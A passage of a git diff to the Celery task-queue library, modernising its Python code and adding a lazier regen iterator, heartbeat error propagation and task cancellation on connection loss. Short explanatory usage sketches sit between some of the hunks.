+ return chain(*(op(d) for d in reversed(self.maps)))
def _iterate_keys(self):
# type: () -> Iterable
@@ -360,23 +346,9 @@ def _iterate_values(self):
def bind_to(self, callback):
self._observers.append(callback)
- if sys.version_info[0] == 3: # pragma: no cover
- keys = _iterate_keys
- items = _iterate_items
- values = _iterate_values
-
- else: # noqa
- def keys(self):
- # type: () -> List[Any]
- return list(self._iterate_keys())
-
- def items(self):
- # type: () -> List[Tuple[Any, Any]]
- return list(self._iterate_items())
-
- def values(self):
- # type: () -> List[Any]
- return list(self._iterate_values())
+ keys = _iterate_keys
+ items = _iterate_items
+ values = _iterate_values
class ConfigurationView(ChainMap, AttributeDictMixin):
@@ -696,7 +668,7 @@ def _heap_overload(self):
return len(self._heap) * 100 / max(len(self._data), 1) - 100
-MutableSet.register(LimitedSet) # noqa: E305
+MutableSet.register(LimitedSet)
class Evictable:
@@ -797,7 +769,7 @@ def _evictcount(self):
return len(self)
-Sequence.register(Messagebuffer) # noqa: E305
+Sequence.register(Messagebuffer)
class BufferMap(OrderedDict, Evictable):
diff --git a/celery/utils/debug.py b/celery/utils/debug.py
index 0641f1d6c92..3515dc84f9b 100644
--- a/celery/utils/debug.py
+++ b/celery/utils/debug.py
@@ -12,7 +12,7 @@
try:
from psutil import Process
except ImportError:
- Process = None # noqa
+ Process = None
__all__ = (
'blockdetection', 'sample_mem', 'memdump', 'sample',
diff --git a/celery/utils/dispatch/signal.py b/celery/utils/dispatch/signal.py
index b12759c4f37..0cfa6127ed0 100644
--- a/celery/utils/dispatch/signal.py
+++ b/celery/utils/dispatch/signal.py
@@ -254,9 +254,9 @@ def has_listeners(self, sender=None):
def send(self, sender, **named):
"""Send signal from sender to all connected receivers.
- If any receiver raises an error, the error propagates back through
- send, terminating the dispatch loop, so it is quite possible to not
- have all receivers called if a raises an error.
+ If any receiver raises an error, the exception is returned as the
+ corresponding response. (This is different from the "send" in
+ Django signals. In Celery "send" and "send_robust" do the same thing.)
Arguments:
sender (Any): The sender of the signal.
diff --git a/celery/utils/functional.py b/celery/utils/functional.py
index b28e4a3ba48..e8a8453cc6e 100644
--- a/celery/utils/functional.py
+++ b/celery/utils/functional.py
@@ -1,9 +1,9 @@
-"""Functional-style utilties."""
+"""Functional-style utilities."""
import inspect
import sys
from collections import UserList
from functools import partial
-from itertools import chain, islice
+from itertools import islice, tee, zip_longest
from kombu.utils.functional import (LRUCache, dictfilter, is_list, lazy,
maybe_evaluate, maybe_list, memoize)
@@ -90,6 +90,7 @@ def firstmethod(method, on_call=None):
The list can also contain lazy instances
(:class:`~kombu.utils.functional.lazy`.)
"""
+
def _matcher(it, *args, **kwargs):
for obj in it:
try:
@@ -101,6 +102,7 @@ def _matcher(it, *args, **kwargs):
else:
if reply is not None:
return reply
+
return _matcher
@@ -160,6 +162,19 @@ def uniq(it):
return (seen.add(obj) or obj for obj in it if obj not in seen)
+def lookahead(it):
+ """Yield pairs of (current, next) items in `it`.
+
+ `next` is None if `current` is the last item.
+ Example:
+ >>> list(lookahead(x for x in range(6)))
+ [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, None)]
+ """
+ a, b = tee(it)
+ next(b, None)
+ return zip_longest(a, b)
+
+
def regen(it):
"""Convert iterator to an object that can be consumed multiple times.
@@ -180,8 +195,8 @@ def __init__(self, it):
# UserList creates a new list and sets .data, so we don't
# want to call init here.
self.__it = it
- self.__index = 0
self.__consumed = []
+ self.__done = False
def __reduce__(self):
return list, (self.data,)
@@ -189,31 +204,71 @@ def __reduce__(self):
def __length_hint__(self):
return self.__it.__length_hint__()
+ def __lookahead_consume(self, limit=None):
+ if not self.__done and (limit is None or limit > 0):
+ it = iter(self.__it)
+ try:
+ now = next(it)
+ except StopIteration:
+ return
+ self.__consumed.append(now)
+ # Maintain a single look-ahead to ensure we set `__done` when the
+ # underlying iterator gets exhausted
+ while not self.__done:
+ try:
+ next_ = next(it)
+ self.__consumed.append(next_)
+ except StopIteration:
+ self.__done = True
+ break
+ finally:
+ yield now
+ now = next_
+ # We can break out when `limit` is exhausted
+ if limit is not None:
+ limit -= 1
+ if limit <= 0:
+ break
+
def __iter__(self):
- return chain(self.__consumed, self.__it)
+ yield from self.__consumed
+ yield from self.__lookahead_consume()
def __getitem__(self, index):
if index < 0:
return self.data[index]
+ # Consume elements up to the desired index prior to attempting to
+ # access it from within `__consumed`
+ consume_count = index - len(self.__consumed) + 1
+ for _ in self.__lookahead_consume(limit=consume_count):
+ pass
+ return self.__consumed[index]
+
+ def __bool__(self):
+ if len(self.__consumed):
+ return True
+
try:
- return self.__consumed[index]
- except IndexError:
- try:
- for _ in range(self.__index, index + 1):
- self.__consumed.append(next(self.__it))
- except StopIteration:
- raise IndexError(index)
- else:
- return self.__consumed[index]
+ next(iter(self))
+ except StopIteration:
+ return False
+ else:
+ return True
@property
def data(self):
- try:
- self.__consumed.extend(list(self.__it))
- except StopIteration:
- pass
+ if not self.__done:
+ self.__consumed.extend(self.__it)
+ self.__done = True
return self.__consumed
+ def __repr__(self):
+ return "<{}: [{}{}]>".format(
+ self.__class__.__name__,
+ ", ".join(repr(e) for e in self.__consumed),
+ "..." if not self.__done else "",
+ )
+
def _argsfromspec(spec, replace_defaults=True):
if spec.defaults:
@@ -228,11 +283,11 @@ def _argsfromspec(spec, replace_defaults=True):
varargs = spec.varargs
varkw = spec.varkw
if spec.kwonlydefaults:
- split = len(spec.kwonlydefaults)
- kwonlyargs = spec.kwonlyargs[:-split]
+ kwonlyargs = set(spec.kwonlyargs) - set(spec.kwonlydefaults.keys())
if replace_defaults:
kwonlyargs_optional = [
- (kw, i) for i, kw in enumerate(spec.kwonlyargs[-split:])]
+ (kw, i) for i, kw in enumerate(spec.kwonlydefaults.keys())
+ ]
else:
kwonlyargs_optional = list(spec.kwonlydefaults.items())
else:
@@ -296,24 +351,12 @@ def fun_takes_argument(name, fun, position=None):
)
-if hasattr(inspect, 'signature'):
- def fun_accepts_kwargs(fun):
- """Return true if function accepts arbitrary keyword arguments."""
- return any(
- p for p in inspect.signature(fun).parameters.values()
- if p.kind == p.VAR_KEYWORD
- )
-else:
- def fun_accepts_kwargs(fun): # noqa
- """Return true if function accepts arbitrary keyword arguments."""
- try:
- argspec = inspect.getargspec(fun)
- except TypeError:
- try:
- argspec = inspect.getargspec(fun.__call__)
- except (TypeError, AttributeError):
- return
- return not argspec or argspec[2] is not None
+def fun_accepts_kwargs(fun):
+ """Return true if function accepts arbitrary keyword arguments."""
+ return any(
+ p for p in inspect.signature(fun).parameters.values()
+ if p.kind == p.VAR_KEYWORD
+ )
def maybe(typ, val):
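
A minimal sketch of the rewritten ``regen`` behaviour together with the new ``lookahead`` helper: consumption is lazy, indexed access only pulls what it needs, and iteration can be repeated once items have been consumed:

    from celery.utils.functional import lookahead, regen

    g = regen(x * 2 for x in range(3))
    assert bool(g)                     # peeks without draining the iterator
    assert g[2] == 4                   # consumes up to the requested index
    assert list(g) == [0, 2, 4]        # repeatable afterwards
    assert list(g) == [0, 2, 4]

    assert list(lookahead('abc')) == [('a', 'b'), ('b', 'c'), ('c', None)]
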
diff --git a/celery/utils/imports.py b/celery/utils/imports.py
index fd9009c32ac..0303bd3c051 100644
--- a/celery/utils/imports.py
+++ b/celery/utils/imports.py
@@ -25,21 +25,14 @@ class NotAPackage(Exception):
"""Raised when importing a package, but it's not a package."""
-if sys.version_info > (3, 3): # pragma: no cover
- def qualname(obj):
- """Return object name."""
- if not hasattr(obj, '__name__') and hasattr(obj, '__class__'):
- obj = obj.__class__
- q = getattr(obj, '__qualname__', None)
- if '.' not in q:
- q = '.'.join((obj.__module__, q))
- return q
-else:
- def qualname(obj): # noqa
- """Return object name."""
- if not hasattr(obj, '__name__') and hasattr(obj, '__class__'):
- obj = obj.__class__
- return '.'.join((obj.__module__, obj.__name__))
+def qualname(obj):
+ """Return object name."""
+ if not hasattr(obj, '__name__') and hasattr(obj, '__class__'):
+ obj = obj.__class__
+ q = getattr(obj, '__qualname__', None)
+ if '.' not in q:
+ q = '.'.join((obj.__module__, q))
+ return q
def instantiate(name, *args, **kwargs):
diff --git a/celery/utils/log.py b/celery/utils/log.py
index 6acff167fcf..668094c5ce5 100644
--- a/celery/utils/log.py
+++ b/celery/utils/log.py
@@ -6,6 +6,7 @@
import threading
import traceback
from contextlib import contextmanager
+from typing import AnyStr, Sequence
from kombu.log import LOG_LEVELS
from kombu.log import get_logger as _get_logger
@@ -132,17 +133,17 @@ class ColorFormatter(logging.Formatter):
}
def __init__(self, fmt=None, use_color=True):
- logging.Formatter.__init__(self, fmt)
+ super().__init__(fmt)
self.use_color = use_color
def formatException(self, ei):
if ei and not isinstance(ei, tuple):
ei = sys.exc_info()
- r = logging.Formatter.formatException(self, ei)
+ r = super().formatException(ei)
return r
def format(self, record):
- msg = logging.Formatter.format(self, record)
+ msg = super().format(record)
color = self.colors.get(record.levelname)
# reset exception info later for other handlers...
@@ -167,7 +168,7 @@ def format(self, record):
),
)
try:
- return logging.Formatter.format(self, record)
+ return super().format(record)
finally:
record.msg, record.exc_info = prev_msg, einfo
else:
@@ -214,19 +215,25 @@ def handleError(self, record):
return [wrap_handler(h) for h in self.logger.handlers]
def write(self, data):
+ # type: (AnyStr) -> int
"""Write message to logging object."""
if _in_sighandler:
- return print(safe_str(data), file=sys.__stderr__)
+ safe_data = safe_str(data)
+ print(safe_data, file=sys.__stderr__)
+ return len(safe_data)
if getattr(self._thread, 'recurse_protection', False):
# Logger is logging back to this file, so stop recursing.
- return
- data = data.strip()
+ return 0
if data and not self.closed:
self._thread.recurse_protection = True
try:
- self.logger.log(self.loglevel, safe_str(data))
+ safe_data = safe_str(data).rstrip('\n')
+ if safe_data:
+ self.logger.log(self.loglevel, safe_data)
+ return len(safe_data)
finally:
self._thread.recurse_protection = False
+ return 0
def writelines(self, sequence):
# type: (Sequence[str]) -> None
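
``LoggingProxy.write`` now behaves more like a real file object by returning the number of characters handled; a minimal sketch:

    import logging
    from celery.utils.log import LoggingProxy, get_logger

    logger = get_logger('sketch')
    logger.addHandler(logging.StreamHandler())
    proxy = LoggingProxy(logger, loglevel=logging.INFO)

    # The trailing newline is stripped before logging, and the length of the
    # logged text is returned, as file-like consumers expect a count back.
    n = proxy.write('hello world\n')
    assert n == len('hello world')
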
diff --git a/celery/utils/saferepr.py b/celery/utils/saferepr.py
index e07b979e879..adcfc72efca 100644
--- a/celery/utils/saferepr.py
+++ b/celery/utils/saferepr.py
@@ -15,6 +15,8 @@
from itertools import chain
from numbers import Number
from pprint import _recursion
+from typing import (Any, AnyStr, Callable, Dict, Iterator, List, Sequence,
+ Set, Tuple)
from .text import truncate
@@ -100,7 +102,7 @@ def _chainlist(it, LIT_LIST_SEP=LIT_LIST_SEP):
def _repr_empty_set(s):
# type: (Set) -> str
- return '{}()'.format(type(s).__name__)
+ return f'{type(s).__name__}()'
def _safetext(val):
@@ -191,7 +193,7 @@ def _saferepr(o, maxlen=None, maxlevels=3, seen=None):
def _reprseq(val, lit_start, lit_end, builtin_type, chainer):
# type: (Sequence, _literal, _literal, Any, Any) -> Tuple[Any, ...]
- if type(val) is builtin_type: # noqa
+ if type(val) is builtin_type:
return lit_start, lit_end, chainer(val)
return (
_literal(f'{type(val).__name__}({lit_start.value}', False, +1),
diff --git a/celery/utils/serialization.py b/celery/utils/serialization.py
index af7804a2132..c03a20f9419 100644
--- a/celery/utils/serialization.py
+++ b/celery/utils/serialization.py
@@ -13,7 +13,7 @@
try:
import cPickle as pickle
except ImportError:
- import pickle # noqa
+ import pickle
__all__ = (
'UnpickleableExceptionWrapper', 'subclass_exception',
@@ -30,7 +30,7 @@
'on': True, 'off': False}
-def subclass_exception(name, parent, module): # noqa
+def subclass_exception(name, parent, module):
"""Create new exception class."""
return type(name, (parent,), {'__module__': module})
@@ -133,8 +133,8 @@ def __init__(self, exc_module, exc_cls_name, exc_args, text=None):
self.exc_cls_name = exc_cls_name
self.exc_args = safe_exc_args
self.text = text
- Exception.__init__(self, exc_module, exc_cls_name, safe_exc_args,
- text)
+ super().__init__(exc_module, exc_cls_name, safe_exc_args,
+ text)
def restore(self):
return create_exception_cls(self.exc_cls_name,
diff --git a/celery/utils/sysinfo.py b/celery/utils/sysinfo.py
index 7032d4de885..57425dd8173 100644
--- a/celery/utils/sysinfo.py
+++ b/celery/utils/sysinfo.py
@@ -14,7 +14,7 @@ def _load_average():
else: # pragma: no cover
# Windows doesn't have getloadavg
- def _load_average(): # noqa
+ def _load_average():
return (0.0, 0.0, 0.0)
diff --git a/celery/utils/text.py b/celery/utils/text.py
index b90e8a21b45..8f4a321eebb 100644
--- a/celery/utils/text.py
+++ b/celery/utils/text.py
@@ -5,6 +5,7 @@
from functools import partial
from pprint import pformat
from textwrap import fill
+from typing import Any, List, Mapping, Pattern
__all__ = (
'abbr', 'abbrtask', 'dedent', 'dedent_initial',
@@ -32,13 +33,13 @@ def str_to_list(s):
def dedent_initial(s, n=4):
# type: (str, int) -> str
- """Remove identation from first line of text."""
+ """Remove indentation from first line of text."""
return s[n:] if s[:n] == ' ' * n else s
def dedent(s, n=4, sep='\n'):
# type: (str, int, str) -> str
- """Remove identation."""
+ """Remove indentation."""
return sep.join(dedent_initial(l) for l in s.splitlines())
@@ -111,7 +112,7 @@ def pretty(value, width=80, nl_width=80, sep='\n', **kw):
# type: (str, int, int, str, **Any) -> str
"""Format value for printing to console."""
if isinstance(value, dict):
- return '{{{0} {1}'.format(sep, pformat(value, 4, nl_width)[1:])
+ return f'{{{sep} {pformat(value, 4, nl_width)[1:]}'
elif isinstance(value, tuple):
return '{}{}{}'.format(
sep, ' ' * 4, pformat(value, width=nl_width, **kw),
diff --git a/celery/utils/threads.py b/celery/utils/threads.py
index 68c12fd1093..94c6f617c40 100644
--- a/celery/utils/threads.py
+++ b/celery/utils/threads.py
@@ -13,15 +13,15 @@
from greenlet import getcurrent as get_ident
except ImportError: # pragma: no cover
try:
- from _thread import get_ident # noqa
+ from _thread import get_ident
except ImportError:
try:
- from thread import get_ident # noqa
+ from thread import get_ident
except ImportError: # pragma: no cover
try:
- from _dummy_thread import get_ident # noqa
+ from _dummy_thread import get_ident
except ImportError:
- from dummy_thread import get_ident # noqa
+ from dummy_thread import get_ident
__all__ = (
@@ -46,8 +46,8 @@ class bgThread(threading.Thread):
def __init__(self, name=None, **kwargs):
super().__init__()
- self._is_shutdown = threading.Event()
- self._is_stopped = threading.Event()
+ self.__is_shutdown = threading.Event()
+ self.__is_stopped = threading.Event()
self.daemon = True
self.name = name or self.__class__.__name__
@@ -60,7 +60,7 @@ def on_crash(self, msg, *fmt, **kwargs):
def run(self):
body = self.body
- shutdown_set = self._is_shutdown.is_set
+ shutdown_set = self.__is_shutdown.is_set
try:
while not shutdown_set():
try:
@@ -77,7 +77,7 @@ def run(self):
def _set_stopped(self):
try:
- self._is_stopped.set()
+ self.__is_stopped.set()
except TypeError: # pragma: no cover
# we lost the race at interpreter shutdown,
# so gc collected built-in modules.
@@ -85,8 +85,8 @@ def _set_stopped(self):
def stop(self):
"""Graceful shutdown."""
- self._is_shutdown.set()
- self._is_stopped.wait()
+ self.__is_shutdown.set()
+ self.__is_stopped.wait()
if self.is_alive():
self.join(THREAD_TIMEOUT_MAX)
@@ -282,7 +282,7 @@ def __init__(self, locals=None, ident_func=None):
def get_ident(self):
"""Return context identifier.
- This is the indentifer the local objects use internally
+ This is the identifier the local objects use internally
for this context. You cannot override this method to change the
behavior but use it to link other context local objects (such as
SQLAlchemy's scoped sessions) to the Werkzeug locals.
@@ -328,4 +328,4 @@ def __len__(self):
# since each thread has its own greenlet we can just use those as
# identifiers for the context. If greenlets aren't available we
# fall back to the current thread ident.
- LocalStack = _LocalStack # noqa
+ LocalStack = _LocalStack
diff --git a/celery/utils/time.py b/celery/utils/time.py
index 55f7fce732c..c898b90e93a 100644
--- a/celery/utils/time.py
+++ b/celery/utils/time.py
@@ -66,7 +66,7 @@ def __init__(self):
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
- tzinfo.__init__(self)
+ super().__init__()
def __repr__(self):
return f''
diff --git a/celery/utils/timer2.py b/celery/utils/timer2.py
index 07f4b288a9e..88d8ffd77ad 100644
--- a/celery/utils/timer2.py
+++ b/celery/utils/timer2.py
@@ -48,13 +48,17 @@ def __init__(self, schedule=None, on_error=None, on_tick=None,
max_interval=max_interval)
self.on_start = on_start
self.on_tick = on_tick or self.on_tick
- threading.Thread.__init__(self)
- self._is_shutdown = threading.Event()
- self._is_stopped = threading.Event()
+ super().__init__()
+ # `_is_stopped` is likely to be an attribute on `Thread` objects so we
+ # double underscore these names to avoid shadowing anything and
+ # potentially getting confused by the superclass turning these into
+ # something other than an `Event` instance (e.g. a `bool`)
+ self.__is_shutdown = threading.Event()
+ self.__is_stopped = threading.Event()
self.mutex = threading.Lock()
self.not_empty = threading.Condition(self.mutex)
self.daemon = True
- self.name = 'Timer-{}'.format(next(self._timer_count))
+ self.name = f'Timer-{next(self._timer_count)}'
def _next_entry(self):
with self.not_empty:
@@ -71,7 +75,7 @@ def run(self):
self.running = True
self.scheduler = iter(self.schedule)
- while not self._is_shutdown.isSet():
+ while not self.__is_shutdown.is_set():
delay = self._next_entry()
if delay:
if self.on_tick:
@@ -80,7 +84,7 @@ def run(self):
break
sleep(delay)
try:
- self._is_stopped.set()
+ self.__is_stopped.set()
except TypeError: # pragma: no cover
# we lost the race at interpreter shutdown,
# so gc collected built-in modules.
@@ -91,9 +95,9 @@ def run(self):
os._exit(1)
def stop(self):
- self._is_shutdown.set()
+ self.__is_shutdown.set()
if self.running:
- self._is_stopped.wait()
+ self.__is_stopped.wait()
self.join(THREAD_TIMEOUT_MAX)
self.running = False
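
The double-underscore rename relies on ordinary name mangling, so the events can no longer collide with attributes that ``threading.Thread`` itself manages (CPython sets ``_is_stopped`` to a plain bool). A minimal sketch of the effect:

    import threading

    class Timer(threading.Thread):
        def __init__(self):
            super().__init__()
            # Stored as `_Timer__is_stopped`, so it cannot be shadowed by the
            # base class's own `_is_stopped` attribute.
            self.__is_stopped = threading.Event()

    t = Timer()
    assert isinstance(t._Timer__is_stopped, threading.Event)
    assert isinstance(t._is_stopped, bool)  # Thread's own flag is untouched
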
diff --git a/celery/worker/consumer/consumer.py b/celery/worker/consumer/consumer.py
index a3fd0afde73..c72493f5d02 100644
--- a/celery/worker/consumer/consumer.py
+++ b/celery/worker/consumer/consumer.py
@@ -7,6 +7,7 @@
import errno
import logging
import os
+import warnings
from collections import defaultdict
from time import sleep
@@ -21,7 +22,8 @@
from celery import bootsteps, signals
from celery.app.trace import build_tracer
-from celery.exceptions import InvalidTaskError, NotRegistered
+from celery.exceptions import (CPendingDeprecationWarning, InvalidTaskError,
+ NotRegistered)
from celery.utils.functional import noop
from celery.utils.log import get_logger
from celery.utils.nodenames import gethostname
@@ -29,8 +31,8 @@
from celery.utils.text import truncate
from celery.utils.time import humanize_seconds, rate
from celery.worker import loops
-from celery.worker.state import (maybe_shutdown, reserved_requests,
- task_reserved)
+from celery.worker.state import (active_requests, maybe_shutdown,
+ reserved_requests, task_reserved)
__all__ = ('Consumer', 'Evloop', 'dump_body')
@@ -106,6 +108,19 @@
delivery_info:{3} headers={4}}}
"""
+TERMINATING_TASK_ON_RESTART_AFTER_A_CONNECTION_LOSS = """\
+Task %s cannot be acknowledged after a connection loss since late acknowledgement is enabled for it.
+Terminating it instead.
+"""
+
+CANCEL_TASKS_BY_DEFAULT = """
+In Celery 5.1 we introduced an optional breaking change which
+on connection loss cancels all currently executing tasks with late acknowledgement enabled.
+These tasks cannot be acknowledged as the connection is gone, and the tasks are automatically redelivered back to the queue.
+You can enable this behavior using the worker_cancel_long_running_tasks_on_connection_loss setting.
+In Celery 5.1 it is set to False by default. The setting will be set to True by default in Celery 6.0.
+""" # noqa: E501
+
def dump_body(m, body):
"""Format message body for debugging purposes."""
@@ -257,7 +272,7 @@ def _update_prefetch_count(self, index=0):
def _update_qos_eventually(self, index):
return (self.qos.decrement_eventually if index < 0
else self.qos.increment_eventually)(
- abs(index) * self.prefetch_multiplier)
+ abs(index) * self.prefetch_multiplier)
def _limit_move_to_pool(self, request):
task_reserved(request)
@@ -336,6 +351,15 @@ def on_connection_error_after_connected(self, exc):
except Exception: # pylint: disable=broad-except
pass
+ if self.app.conf.worker_cancel_long_running_tasks_on_connection_loss:
+ for request in tuple(active_requests):
+ if request.task.acks_late and not request.acknowledged:
+ warn(TERMINATING_TASK_ON_RESTART_AFTER_A_CONNECTION_LOSS,
+ request)
+ request.cancel(self.pool)
+ else:
+ warnings.warn(CANCEL_TASKS_BY_DEFAULT, CPendingDeprecationWarning)
+
def register_with_event_loop(self, hub):
self.blueprint.send_all(
self, 'register_with_event_loop', args=(hub,),
@@ -487,7 +511,8 @@ def on_unknown_message(self, body, message):
signals.task_rejected.send(sender=self, message=message, exc=None)
def on_unknown_task(self, body, message, exc):
- error(UNKNOWN_TASK_ERROR, exc, dump_body(message, body), exc_info=True)
+ error(UNKNOWN_TASK_ERROR, exc, dump_body(message, body),
+ exc_info=True)
try:
id_, name = message.headers['id'], message.headers['task']
root_id = message.headers.get('root_id')
@@ -515,7 +540,8 @@ def on_unknown_task(self, body, message, exc):
)
def on_invalid_task(self, body, message, exc):
- error(INVALID_TASK_ERROR, exc, dump_body(message, body), exc_info=True)
+ error(INVALID_TASK_ERROR, exc, dump_body(message, body),
+ exc_info=True)
message.reject_log_error(logger, self.connection_errors)
signals.task_rejected.send(sender=self, message=message, exc=exc)
@@ -539,7 +565,7 @@ def on_task_received(message):
# will defer deserializing the message body to the pool.
payload = None
try:
- type_ = message.headers['task'] # protocol v2
+ type_ = message.headers['task'] # protocol v2
except TypeError:
return on_unknown_message(None, message)
except KeyError:
diff --git a/celery/worker/control.py b/celery/worker/control.py
index 9d8a6797dee..197d0c4d617 100644
--- a/celery/worker/control.py
+++ b/celery/worker/control.py
@@ -187,7 +187,7 @@ def rate_limit(state, task_name, rate_limit, **kwargs):
"""Tell worker(s) to modify the rate limit for a task by type.
See Also:
- :attr:`celery.task.base.Task.rate_limit`.
+ :attr:`celery.app.task.Task.rate_limit`.
Arguments:
task_name (str): Type of task to set rate limit for.
@@ -310,6 +310,8 @@ def hello(state, from_node, revoked=None, **kwargs):
logger.info('sync with %s', from_node)
if revoked:
worker_state.revoked.update(revoked)
+ # Do not send expired items to the other worker.
+ worker_state.revoked.purge()
return {
'revoked': worker_state.revoked._data,
'clock': state.app.clock.forward(),
@@ -362,9 +364,9 @@ def reserved(state, **kwargs):
@inspect_command(alias='dump_active')
-def active(state, **kwargs):
+def active(state, safe=False, **kwargs):
"""List of tasks currently being executed."""
- return [request.info()
+ return [request.info(safe=safe)
for request in state.tset(worker_state.active_requests)]
diff --git a/celery/worker/loops.py b/celery/worker/loops.py
index b60d95c11de..0630e679fdd 100644
--- a/celery/worker/loops.py
+++ b/celery/worker/loops.py
@@ -26,11 +26,25 @@ def _quick_drain(connection, timeout=0.1):
def _enable_amqheartbeats(timer, connection, rate=2.0):
- if connection:
- tick = connection.heartbeat_check
- heartbeat = connection.get_heartbeat_interval() # negotiated
- if heartbeat and connection.supports_heartbeats:
- timer.call_repeatedly(heartbeat / rate, tick, (rate,))
+ heartbeat_error = [None]
+
+ if not connection:
+ return heartbeat_error
+
+ heartbeat = connection.get_heartbeat_interval() # negotiated
+ if not (heartbeat and connection.supports_heartbeats):
+ return heartbeat_error
+
+ def tick(rate):
+ try:
+ connection.heartbeat_check(rate)
+ except Exception as e:
+            # heartbeat_error is passed by reference and can be updated
+            # no append here; the list should remain at a fixed size of 1
+ heartbeat_error[0] = e
+
+ timer.call_repeatedly(heartbeat / rate, tick, (rate,))
+ return heartbeat_error
def asynloop(obj, connection, consumer, blueprint, hub, qos,
@@ -42,7 +56,7 @@ def asynloop(obj, connection, consumer, blueprint, hub, qos,
on_task_received = obj.create_task_handler()
- _enable_amqheartbeats(hub.timer, connection, rate=hbrate)
+ heartbeat_error = _enable_amqheartbeats(hub.timer, connection, rate=hbrate)
consumer.on_message = on_task_received
obj.controller.register_with_event_loop(hub)
@@ -70,6 +84,8 @@ def asynloop(obj, connection, consumer, blueprint, hub, qos,
try:
while blueprint.state == RUN and obj.connection:
state.maybe_shutdown()
+ if heartbeat_error[0] is not None:
+ raise heartbeat_error[0]
# We only update QoS when there's no more messages to read.
# This groups together qos calls, and makes sure that remote
@@ -95,8 +111,9 @@ def synloop(obj, connection, consumer, blueprint, hub, qos,
RUN = bootsteps.RUN
on_task_received = obj.create_task_handler()
perform_pending_operations = obj.perform_pending_operations
+ heartbeat_error = [None]
if getattr(obj.pool, 'is_green', False):
- _enable_amqheartbeats(obj.timer, connection, rate=hbrate)
+ heartbeat_error = _enable_amqheartbeats(obj.timer, connection, rate=hbrate)
consumer.on_message = on_task_received
consumer.consume()
@@ -104,6 +121,8 @@ def synloop(obj, connection, consumer, blueprint, hub, qos,
while blueprint.state == RUN and obj.connection:
state.maybe_shutdown()
+ if heartbeat_error[0] is not None:
+ raise heartbeat_error[0]
if qos.prev != qos.value:
qos.update()
try:
diff --git a/celery/worker/request.py b/celery/worker/request.py
index 81c3387d98a..fb6d60e6812 100644
--- a/celery/worker/request.py
+++ b/celery/worker/request.py
@@ -13,9 +13,9 @@
from kombu.utils.encoding import safe_repr, safe_str
from kombu.utils.objects import cached_property
-from celery import signals
+from celery import current_app, signals
from celery.app.task import Context
-from celery.app.trace import trace_task, trace_task_ret
+from celery.app.trace import fast_trace_task, trace_task, trace_task_ret
from celery.exceptions import (Ignore, InvalidTaskError, Reject, Retry,
TaskRevokedError, Terminated,
TimeLimitExceeded, WorkerLostError)
@@ -50,11 +50,12 @@ def __optimize__():
_does_info = logger.isEnabledFor(logging.INFO)
-__optimize__() # noqa: E305
+__optimize__()
# Localize
tz_or_local = timezone.tz_or_local
send_revoked = signals.task_revoked.send
+send_retry = signals.task_retry.send
task_accepted = state.task_accepted
task_ready = state.task_ready
@@ -69,6 +70,7 @@ class Request:
worker_pid = None
time_limits = (None, None)
_already_revoked = False
+ _already_cancelled = False
_terminate_on_ack = None
_apply_result = None
_tzlocal = None
@@ -91,7 +93,8 @@ def __init__(self, message, on_ack=noop,
maybe_make_aware=maybe_make_aware,
maybe_iso8601=maybe_iso8601, **opts):
self._message = message
- self._request_dict = message.headers if headers is None else headers
+ self._request_dict = (message.headers.copy() if headers is None
+ else headers.copy())
self._body = message.body if body is None else body
self._app = app
self._utc = utc
@@ -120,6 +123,7 @@ def __init__(self, message, on_ack=noop,
self._eventer = eventer
self._connection_errors = connection_errors or ()
self._task = task or self._app.tasks[self._type]
+ self._ignore_result = self._request_dict.get('ignore_result', False)
# timezone means the message is timezone-aware, and the only timezone
# supported at this point is UTC.
@@ -154,6 +158,7 @@ def __init__(self, message, on_ack=noop,
'redelivered': delivery_info.get('redelivered'),
}
self._request_dict.update({
+ 'properties': properties,
'reply_to': properties.get('reply_to'),
'correlation_id': properties.get('correlation_id'),
'hostname': self._hostname,
@@ -240,6 +245,10 @@ def on_reject(self, value):
def hostname(self):
return self._hostname
+ @property
+ def ignore_result(self):
+ return self._ignore_result
+
@property
def eventer(self):
return self._eventer
@@ -284,7 +293,7 @@ def task_id(self):
# XXX compat
return self.id
- @task_id.setter # noqa
+ @task_id.setter
def task_id(self, value):
self.id = value
@@ -293,7 +302,7 @@ def task_name(self):
# XXX compat
return self.name
- @task_name.setter # noqa
+ @task_name.setter
def task_name(self, value):
self.name = value
@@ -302,6 +311,10 @@ def reply_to(self):
# used by rpc backend when failures reported by parent process
return self._request_dict['reply_to']
+ @property
+ def replaced_task_nesting(self):
+ return self._request_dict.get('replaced_task_nesting', 0)
+
@property
def correlation_id(self):
# used similarly to reply_to
@@ -323,8 +336,9 @@ def execute_using_pool(self, pool, **kwargs):
raise TaskRevokedError(task_id)
time_limit, soft_time_limit = self.time_limits
+ trace = fast_trace_task if self._app.use_fast_trace_task else trace_task_ret
result = pool.apply_async(
- trace_task_ret,
+ trace,
args=(self._type, task_id, self._request_dict, self._body,
self._content_type, self._content_encoding),
accept_callback=self.on_accepted,
@@ -393,6 +407,30 @@ def terminate(self, pool, signal=None):
if obj is not None:
obj.terminate(signal)
+ def cancel(self, pool, signal=None):
+ signal = _signals.signum(signal or TERM_SIGNAME)
+ if self.time_start:
+ pool.terminate_job(self.worker_pid, signal)
+ self._announce_cancelled()
+
+ if self._apply_result is not None:
+ obj = self._apply_result() # is a weakref
+ if obj is not None:
+ obj.terminate(signal)
+
+ def _announce_cancelled(self):
+ task_ready(self)
+ self.send_event('task-cancelled')
+ reason = 'cancelled by Celery'
+ exc = Retry(message=reason)
+ self.task.backend.mark_as_retry(self.id,
+ exc,
+ request=self._context)
+
+ self.task.on_retry(exc, self.id, self.args, self.kwargs, None)
+ self._already_cancelled = True
+ send_retry(self.task, request=self._context, einfo=None)
+
def _announce_revoked(self, reason, terminated, signum, expired):
task_ready(self)
self.send_event('task-revoked',
@@ -465,7 +503,7 @@ def on_success(self, failed__retval__runtime, **kwargs):
if isinstance(retval.exception, (SystemExit, KeyboardInterrupt)):
raise retval.exception
return self.on_failure(retval, return_ok=True)
- task_ready(self)
+ task_ready(self, successful=True)
if self.task.acks_late:
self.acknowledge()
@@ -484,24 +522,41 @@ def on_retry(self, exc_info):
def on_failure(self, exc_info, send_failed_event=True, return_ok=False):
"""Handler called if the task raised an exception."""
task_ready(self)
- if isinstance(exc_info.exception, MemoryError):
- raise MemoryError(f'Process got: {exc_info.exception}')
- elif isinstance(exc_info.exception, Reject):
- return self.reject(requeue=exc_info.exception.requeue)
- elif isinstance(exc_info.exception, Ignore):
- return self.acknowledge()
-
exc = exc_info.exception
